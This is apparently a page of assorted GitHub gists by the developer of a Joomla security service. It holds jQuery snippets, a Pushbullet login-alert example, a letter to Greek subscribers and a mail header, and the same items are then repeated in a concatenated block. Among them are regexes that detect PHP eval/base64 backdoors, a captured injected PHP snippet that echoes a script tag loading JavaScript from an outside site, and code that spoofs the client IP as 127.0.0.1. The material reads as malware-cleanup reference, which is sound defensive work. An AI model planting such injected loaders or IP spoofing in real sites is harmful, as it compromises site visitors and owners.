Phil E. Taylor PhilETaylor

## content
  if (!is_string(@$json->version)) {
                    $json->version = '';
                }

## removebtn

<script>
    jQuery(document).ready(function(){
        jQuery('#submitBtn').click(function(e){
            jQuery(this).remove();
        });
    });
</script>

## match.regex
<\?php\s*eval\(base64_decode\(\$_POST\['[a-zA-Z0-9]{7}'\]\)\)\;\?>|<\?php\s*\$sF="PCT4BA6ODSE_";\$s21=strtolower\(\$sF\[4\]\.\$sF\[5\]\.\$sF\[9\]\.\$sF\[10\]\.\$sF\[6\]\.\$sF\[3\]\.\$sF\[11\]\.\$sF\[8\]\.\$sF\[10\]\.\$sF\[1\]\.\$sF\[7\]\.\$sF\[8\]\.\$sF\[10\]\);\$s20=strtoupper\(\$sF\[11\]\.\$sF\[0\]\.\$sF\[7\]\.\$sF\[9\]\.\$sF\[2\]\);if\s\(isset\(\$\{\$s20\}\['[a-zA-Z0-9]{7}'\]\)\)\s\{eval\(\$s21\(\$\{\$s20\}\['[a-zA-Z0-9]{7}'\]\)\);\}\?>|<\?php\s*\$qV=\"stop_\";\$s20=strtoupper\(\$qV\[4\].\$qV\[3\].\$qV\[2\].\$qV\[0\].\$qV\[1\]\);if\(isset\(\$\{\$s20\}\['[a-zA-Z0-9]{7}'\]\)\)\{eval\(\$\{\$s20\}\['[a-zA-Z0-9]{7}'\]\);\}\?>


<\?php\s+\$.{4,6}\s=\s\".{4,32}\";\sif\(isset\(\$_REQUEST\[\'.{4,10}\'\]\)\)\s{\s\$.{4,10}\s=\s\$\_REQUEST\[\'.{4,10}\'\];\seval\(\$.{4,10}\);\sexit\(\);\s\}\s+if\(isset\(\$_REQUEST\[\'.{4,10}\'\]\)\)\s\{\s\$.{4,10}\s=\s\$_REQUEST\[\'.{4,10}\'\];\s\$.{4,10}\s=\s\$_REQUEST\[\'.{4,10}\'\];\s\$.{4,10}\s=\sfopen\(\$.{4,10},\s\'w\'\);\s\$.{4,10}\s=\sfwrite\(\$.{4,10},\s\$.{4,10}\);\sfclose\(\

## gist:5347fb3d1dada1fcf361
<?

$TheUsersToken = '.....';

$http = new Zend_Http_Client('https://api.pushbullet.com/v2/pushes');
$http->setHeaders('Authorization', 'Bearer ' . $TheUsersToken);
$http->setParameterPost('type', 'note');
$http->setParameterPost('title', 'Someone logged in as you at myJoomla.com');
$http->setParameterPost('body', 'blah blah blah');
$res = $http->request('POST');

## bad
if(isset($_SERVER))
{
	$_SERVER['PHP_SELF'] = "/";
	$_SERVER['REMOTE_ADDR'] = "127.0.0.1";
	if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
	{
		$_SERVER['HTTP_X_FORWARDED_FOR'] = "127.0.0.1";
	}
}

## gist:65285a43cdc24e8d679e
Hi there Greek friends

Thanks for being a myJoomla.com subscriber.

I have been following the situation in Greece in the news, and have personal friends and word acquaintances in the country.

I understand things are difficult for Greek nationals and companies right now and that its impossible for you to pay bills outside of Greece with credit cards etc… several of you have already been in touch and others have already had failed payments.

I am currently “forgiving” any failed payments by Greek users, and so if your renewal payment fails - for the reason that the Government still has national control over out of country money sending - we will make that invoice as paid/closed/ignored/forgiven and you can continue to use myJoomla.com as if you had paid

## gist:afc67aaa2d3396e06ad2
<?php
#345c77#
if(empty($gsjh)) {$gsjh = "<script type=\"text/javascript\" src=\"http://futureinsiterealty.com/wp-content/themes/realty/l9cdj72f.php?id=1440511\"></script>";echo $gsjh;}
#/345c77#
?>

## snippet.txt
$('#ipDetailsTabs a').click(function (e) {
  google.maps.event.trigger(ipPropertyMap.map, 'resize');
})

## snippet.txt
$('#ipDetailsTabs a').on('click',function (e) {
  google.maps.event.trigger(ipPropertyMap.map, 'resize');
})

## snippet.txt
Return-Path: <MAILER-DAEMON>
Delivered-To: phil@phil-taylor.com
Received: from smtp50.gate.ord1a (smtp50.gate.ord1a.rsapps.net [10.130.4.50])
	by store127a.mail.ord1a (SMTP Server) with ESMTP id 6170AD8001
	for <phil@phil-taylor.com>; Thu,  6 Aug 2015 07:06:46 -0400 (EDT)
X-Spam-Threshold: 95
X-Spam-Score: 0
X-Spam-Flag: NO
X-Virus-Scanned: OK
X-MessageSniffer-Scan-Result: 0

	<script>
	jQuery(document).ready(function(){
	jQuery('#submitBtn').click(function(e){
	jQuery(this).remove();
	});
	});
	</script>
	<\?php\seval\(base64_decode\(\$_POST\['[a-zA-Z0-9]{7}'\]\)\)\;\?>\|<\?php\s\$sF="PCT4BA6ODSE_";\$s21=strtolower\(\$sF\[4\]\.\$sF\[5\]\.\$sF\[9\]\.\$sF\[10\]\.\$sF\[6\]\.\$sF\[3\]\.\$sF\[11\]\.\$sF\[8\]\.\$sF\[10\]\.\$sF\[1\]\.\$sF\[7\]\.\$sF\[8\]\.\$sF\[10\]\);\$s20=strtoupper\(\$sF\[11\]\.\$sF\[0\]\.\$sF\[7\]\.\$sF\[9\]\.\$sF\[2\]\);if\s\(isset\(\$\{\$s20\}\['[a-zA-Z0-9]{7}'\]\)\)\s\{eval\(\$s21\(\$\{\$s20\}\['[a-zA-Z0-9]{7}'\]\)\);\}\?>\|<\?php\s*\$qV=\"stop_\";\$s20=strtoupper\(\$qV\[4\].\$qV\[3\].\$qV\[2\].\$qV\[0\].\$qV\[1\]\);if\(isset\(\$\{\$s20\}\['[a-zA-Z0-9]{7}'\]\)\)\{eval\(\$\{\$s20\}\['[a-zA-Z0-9]{7}'\]\);\}\?>


	<\?php\s+\$.{4,6}\s=\s\".{4,32}\";\sif\(isset\(\$_REQUEST\[\'.{4,10}\'\]\)\)\s{\s\$.{4,10}\s=\s\$\_REQUEST\[\'.{4,10}\'\];\seval\(\$.{4,10}\);\sexit\(\);\s\}\s+if\(isset\(\$_REQUEST\[\'.{4,10}\'\]\)\)\s\{\s\$.{4,10}\s=\s\$_REQUEST\[\'.{4,10}\'\];\s\$.{4,10}\s=\s\$_REQUEST\[\'.{4,10}\'\];\s\$.{4,10}\s=\sfopen\(\$.{4,10},\s\'w\'\);\s\$.{4,10}\s=\sfwrite\(\$.{4,10},\s\$.{4,10}\);\sfclose\(\
	<?

	$TheUsersToken = '.....';

	$http = new Zend_Http_Client('https://api.pushbullet.com/v2/pushes');
	$http->setHeaders('Authorization', 'Bearer ' . $TheUsersToken);
	$http->setParameterPost('type', 'note');
	$http->setParameterPost('title', 'Someone logged in as you at myJoomla.com');
	$http->setParameterPost('body', 'blah blah blah');
	$res = $http->request('POST');
	if(isset($_SERVER))
	{
	$_SERVER['PHP_SELF'] = "/";
	$_SERVER['REMOTE_ADDR'] = "127.0.0.1";
	if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
	{
	$_SERVER['HTTP_X_FORWARDED_FOR'] = "127.0.0.1";
	}
	}
	Hi there Greek friends

	Thanks for being a myJoomla.com subscriber.

	I have been following the situation in Greece in the news, and have personal friends and word acquaintances in the country.

	I understand things are difficult for Greek nationals and companies right now and that its impossible for you to pay bills outside of Greece with credit cards etc… several of you have already been in touch and others have already had failed payments.

	I am currently “forgiving” any failed payments by Greek users, and so if your renewal payment fails - for the reason that the Government still has national control over out of country money sending - we will make that invoice as paid/closed/ignored/forgiven and you can continue to use myJoomla.com as if you had paid
	<?php
	#345c77#
	if(empty($gsjh)) {$gsjh = "<script type=\"text/javascript\" src=\"http://futureinsiterealty.com/wp-content/themes/realty/l9cdj72f.php?id=1440511\"></script>";echo $gsjh;}
	#/345c77#
	?>
	$('#ipDetailsTabs a').click(function (e) {
	google.maps.event.trigger(ipPropertyMap.map, 'resize');
	})
	$('#ipDetailsTabs a').on('click',function (e) {
	google.maps.event.trigger(ipPropertyMap.map, 'resize');
	})
	Return-Path: <MAILER-DAEMON>
	Delivered-To: phil@phil-taylor.com
	Received: from smtp50.gate.ord1a (smtp50.gate.ord1a.rsapps.net [10.130.4.50])
	by store127a.mail.ord1a (SMTP Server) with ESMTP id 6170AD8001
	for <phil@phil-taylor.com>; Thu, 6 Aug 2015 07:06:46 -0400 (EDT)
	X-Spam-Threshold: 95
	X-Spam-Score: 0
	X-Spam-Flag: NO
	X-Virus-Scanned: OK
	X-MessageSniffer-Scan-Result: 0